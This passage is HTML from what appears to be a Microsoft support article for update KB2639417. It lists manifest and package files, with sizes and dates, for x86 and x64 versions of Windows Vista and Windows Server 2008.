class=\"sbody-td\">6.0.6002.22745</td><td class=\"sbody-td\">6,658,560</td><td class=\"sbody-td\">23-Nov-2011</td><td class=\"sbody-td\">13:36</td><td class=\"sbody-td\">IA-64</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows Vista and Windows Server 2008</h3><a class=\"bookmark\" id=\"manifests\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,385</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,102</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,227</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,227</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_2_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,681</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_2~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,708</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,677</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,704</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,438</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,681</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,708</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~x86~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,020</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_15eba5e04425d1c3628cf15d7eddbc55_31bf3856ad364e35_6.0.6002.18544_none_7448bdbccd6ebb75.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_eeed88a208fc8cbf82e0cfad135f2acf_31bf3856ad364e35_6.0.6002.22745_none_5c51dbffe7a63743.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_bab2bc4a97c9dd3c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not 
Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_bb3d5b45b0e69384.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Amd64_c167fb4d416ae4e2fce1560f36235fda_31bf3856ad364e35_6.0.6002.18544_none_27280981728ba91e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_c1a5d0737a69a192855420416ff20a02_31bf3856ad364e35_6.0.6002.22745_none_f950ee30ac983cc5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_16d157ce50274e72.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,559</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:53</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_175bf6c9694404ba.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,559</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,611</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,552</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
